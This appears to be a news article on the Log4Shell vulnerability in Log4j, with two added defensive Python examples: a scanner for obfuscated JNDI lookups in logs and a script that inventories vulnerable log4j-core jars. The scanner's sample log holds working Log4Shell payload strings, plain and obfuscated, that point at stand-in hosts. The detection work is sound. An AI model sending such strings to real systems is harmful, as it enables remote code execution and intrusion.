
The Log4J Vulnerability Will Haunt the Internet for Years


A vulnerability in the open source Apache logging library Log4j sent system administrators and security professionals scrambling over the weekend. Known as Log4Shell, the flaw is exposing some of the world’s most popular applications and services to attack, and the outlook hasn’t improved since the vulnerability came to light on Thursday. If anything, it’s now excruciatingly clear that Log4Shell will continue to wreak havoc across the internet for years to come.

Hackers have been exploiting the bug since the beginning of the month, according to researchers from Cisco and Cloudflare, but attacks ramped up dramatically following Apache’s disclosure on Thursday. So far, attackers have exploited the flaw to install cryptominers on vulnerable systems, steal system credentials, burrow deeper within compromised networks, and steal data, according to a recent report from Microsoft.

The range of impacts is so broad because of the nature of the vulnerability itself. Developers use logging frameworks to keep track of what happens in a given application. To exploit Log4Shell, an attacker only needs to get the system to log a specially crafted string: Log4j interprets it as a lookup expression and resolves it by contacting a server the attacker controls. From there they can load arbitrary code on the targeted server and install malware or launch other attacks. Notably, hackers can introduce the string in seemingly benign ways, like by sending it in an email, placing it in an HTTP header, or setting it as an account username, because any of those values may end up in a log line.
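The mechanism above is easier to grasp by looking at what the crafted strings look like in practice and how a defender would spot them. The following is an added example, not code from the article or from the Log4j project: a small scanner that normalizes the nested-lookup obfuscation attackers use (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}` and the like, all of which Log4j resolves before it sees the final `${jndi:...}`) and then flags log lines that contain a JNDI lookup. The log lines and the IP addresses in them are constructed for the example; the normalization rules implement only the three lookup forms named here, not Log4j's full lookup grammar.

```python
import re
from typing import Dict, List, Optional

# Innermost ${...} expression: a body with no further "${", "{" or "}" inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for after de-obfuscation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Resolve the lookup forms attackers use to hide the word 'jndi'.

    Returns None when the body is not one of the forms handled here, so the
    expression is left in place (this is also what keeps the loop finite)."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()            # ${lower:J} -> j
    if low.startswith("upper:"):
        return body[6:].upper()            # ${upper:j} -> J
    if ":-" in body:
        # Default-value syntax: ${name:-default}. Attackers use an empty or
        # nonexistent name so the default is what survives: ${::-j} -> j
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str, max_rounds: int = 50) -> str:
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def sub(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER.sub(sub, text)
        if not changed:
            break
    return text


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line whose normalized form contains ${jndi:...}."""
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            findings.append({"line": number, "raw": line, "normalized": normalized})
    return findings


# Constructed sample log lines (not real traffic); addresses are RFC 5737 ranges.
SAMPLE_LOG = [
    '198.51.100.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    'login failed for user "${${lower:j}ndi:${lower:l}dap://203.0.113.4/x}"',
    'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.9/o}',
    'user set display name to "${env:HOME}"',
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f['line']}: {f['normalized']}")
```

Two things worth noting from the output. First, the obfuscated lines 3 and 4 normalize to the same `${jndi:ldap://...}` and `${jndi:rmi://...}` shape as the plain one, which is why signature matching on the literal text `${jndi:` alone misses real attacks. Second, the last line carries a lookup that is not JNDI and is not flagged here, but a `${...}` expression arriving in user-controlled input is suspicious on its own and many teams chose to alert on any of them during the response.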

Major tech players, including Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM, have all found that at least some of their services were vulnerable and have been rushing to issue fixes and advise customers about how best to proceed. The exact extent of the exposure is still coming into view, though. Less fastidious organizations or smaller developers who may lack resources and awareness will be slower to confront the Log4Shell threat.

“What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” says independent security researcher Chris Frohoff. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.”

The vulnerability is already being used by a “growing set of threat actors,” US Cybersecurity and Infrastructure Security Agency director Jen Easterly said in a statement on Saturday. She added that the flaw is “one of the most serious I’ve seen in my entire career, if not the most serious” in a call with critical infrastructure operators on Monday, as first reported by CyberScoop. In that same call, a CISA official estimated that hundreds of millions of devices are likely affected.

The hard part will be tracking all of those down. Many organizations don’t have a clear accounting of every program they use and the software components within each of those systems. The UK’s National Cyber Security Centre emphasized on Monday that enterprises need to “discover unknown instances of Log4j” in addition to patching the usual suspects. By its nature, open source software can be incorporated wherever developers want, meaning that when a major vulnerability crops up, exposed code can lurk around every corner. Even before Log4Shell, software supply chain security advocates had increasingly pushed for “software bills of materials,” or SBOMs, to make it easier to take stock and keep up with security protections.
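The NCSC advice to "discover unknown instances of Log4j" is harder than it sounds because Log4j is usually not installed as a package: it ships inside application jars, frequently as a jar nested inside another jar or war, where package managers and naive filename searches do not see it. The following is an added example, not code from the article or from Apache, of the kind of inventory script many responders wrote: it walks a directory tree, opens every archive, recurses into nested archives, and reports any log4j-core it finds along with its version (read from the Maven `pom.properties` that log4j-core jars carry) and whether the `JndiLookup` class, the component the JNDI lookup lives in, is still present. The fixed-version rule encodes the final fixed releases Apache published for the 2.x lines (2.17.1 for Java 8+, 2.12.4 for Java 7, 2.3.2 for Java 6); `build_sample_fat_jar` constructs an in-memory fixture so the example runs offline, and the embedded "class file" is a placeholder, not real bytecode.

```python
import io
import os
import zipfile
from typing import Dict, List, Optional

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def is_fixed_version(version: str) -> bool:
    """True if a log4j-core 2.x version is at or above Apache's final fixed
    release for its line: 2.3.2 (Java 6), 2.12.4 (Java 7), 2.17.1 (Java 8+)."""
    try:
        parts = tuple(int(p) for p in version.split(".")[:3])
    except ValueError:          # e.g. "2.0-beta9": treat as not fixed
        return False
    while len(parts) < 3:
        parts += (0,)
    major, minor, patch = parts
    if major != 2:              # 1.x is a different code base, out of scope here
        return False
    if minor == 3:
        return patch >= 2
    if minor == 12:
        return patch >= 4
    return (minor, patch) >= (17, 1)


def scan_archive(data: bytes, label: str, depth: int = 0, max_depth: int = 5) -> List[Dict[str, object]]:
    """Inspect one archive held in memory and recurse into archives nested in it."""
    findings: List[Dict[str, object]] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:  # a .jar that is not actually a zip: skip it
        return findings
    names = set(zf.namelist())
    if JNDI_CLASS in names or POM_PROPS in names:
        version: Optional[str] = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        findings.append({
            "path": label,
            "version": version,
            "jndi_lookup_present": JNDI_CLASS in names,
            "fixed": is_fixed_version(version) if version else False,
        })
    if depth < max_depth:
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(scan_archive(zf.read(name), f"{label}!{name}", depth + 1, max_depth))
    return findings


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Scan every archive under a directory (the real-world entry point)."""
    findings: List[Dict[str, object]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    findings.extend(scan_archive(fh.read(), path))
    return findings


def build_sample_fat_jar() -> bytes:
    """Constructed fixture: an application jar bundling an old log4j-core
    (2.14.1) under lib/, plus a broken jar that the scanner must tolerate."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM_PROPS, "version=2.14.1\nartifactId=log4j-core\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")      # placeholder, not real bytecode
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr("lib/log4j-core-2.14.1.jar", inner.getvalue())
        z.writestr("lib/other-1.0.jar", b"not a zip")
    return outer.getvalue()


if __name__ == "__main__":
    for f in scan_archive(build_sample_fat_jar(), "app.jar"):
        print(f)
```

Run `scan_tree("/opt")` (or wherever applications live) on a real host and the `path` field tells you not just which file, but which jar inside which jar, carries the library, which is exactly the information a patch plan or an SBOM entry needs. Note the deliberately narrow scope: the script keys on the Maven metadata and the `JndiLookup` class, so a log4j-core that was repackaged with its `META-INF` stripped will show up with `version` unset, and a jar from which the class was removed as a mitigation is reported as "present but without `JndiLookup`" rather than being silently dropped.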
